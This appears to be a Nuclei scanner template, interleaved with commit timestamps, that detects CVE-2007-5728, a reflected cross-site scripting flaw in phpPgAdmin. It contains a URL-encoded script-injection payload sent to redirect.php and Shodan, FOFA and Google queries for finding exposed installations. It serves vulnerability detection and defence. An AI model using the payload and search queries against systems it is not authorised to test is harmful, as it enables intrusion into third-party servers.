2023-07-24 17:58:28 +00:00
id : CVE-2007-5728
2021-11-20 12:27:41 +00:00
info :
2022-08-16 14:14:41 +00:00
name : phpPgAdmin <=4.1.1 - Cross-Site Scripting
2021-11-20 12:27:41 +00:00
author : dhiyaneshDK
severity : medium
2022-08-16 14:14:41 +00:00
description : phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, which are different vectors than CVE-2007-2865.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 13:22:34 +00:00
remediation : |
Upgrade to a patched version of phpPgAdmin or apply the necessary security patches provided by the vendor.
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/30090
2022-05-17 09:18:12 +00:00
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063617.html
2023-07-24 17:58:28 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2007-5728
2023-07-15 16:29:17 +00:00
- http://www.debian.org/security/2008/dsa-1693
- http://www.novell.com/linux/security/advisories/2007_24_sr.html
2022-04-01 08:51:42 +00:00
classification :
2022-09-06 01:33:31 +00:00
cvss-metrics : CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
2023-04-18 02:40:53 +00:00
cvss-score : 4.3
2023-07-24 17:58:28 +00:00
cve-id : CVE-2007-5728
2022-09-06 01:33:31 +00:00
cwe-id : CWE-79
2024-06-07 10:04:29 +00:00
epss-score : 0.0153
epss-percentile : 0.87042
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:phppgadmin:phppgadmin:3.5:*:*:*:*:*:*:*
2022-04-22 10:38:41 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : phppgadmin
product : phppgadmin
2024-06-07 10:04:29 +00:00
shodan-query :
- http.title:"phpPgAdmin"
- http.title:phppgadmin
- cpe:"cpe:2.3:a:phppgadmin_project:phppgadmin"
2024-05-31 19:23:20 +00:00
fofa-query : title=phppgadmin
google-query : intitle:phppgadmin
2024-01-14 09:21:50 +00:00
tags : cve2007,cve,xss,pgadmin,phppgadmin,edb
2021-11-20 12:27:41 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-11-20 12:27:41 +00:00
- method : GET
path :
2023-07-28 06:11:31 +00:00
- '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E?subject=server&server=test'
2021-11-20 12:27:41 +00:00
matchers-condition : and
matchers :
- type : word
words :
2023-07-24 17:55:03 +00:00
- '<script>alert(document.domain)</script>'
- 'phpPgAdmin'
condition : and
case-insensitive : true
2021-11-21 09:23:15 +00:00
2021-11-20 12:27:41 +00:00
- type : word
2021-11-21 09:23:15 +00:00
part : header
2021-11-20 12:27:41 +00:00
words :
- "text/html"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2024-06-08 16:02:17 +00:00
# digest: 4a0a00473045022100953dd54d966440da191127014e76b95981750331f9e3cae028138f6ab2d282e2022020180747ba4e68e033bb63c310e7a3b785f2b329d481c0168ae14b3078ba3027:922c64590222798bb761d5b6d8e72950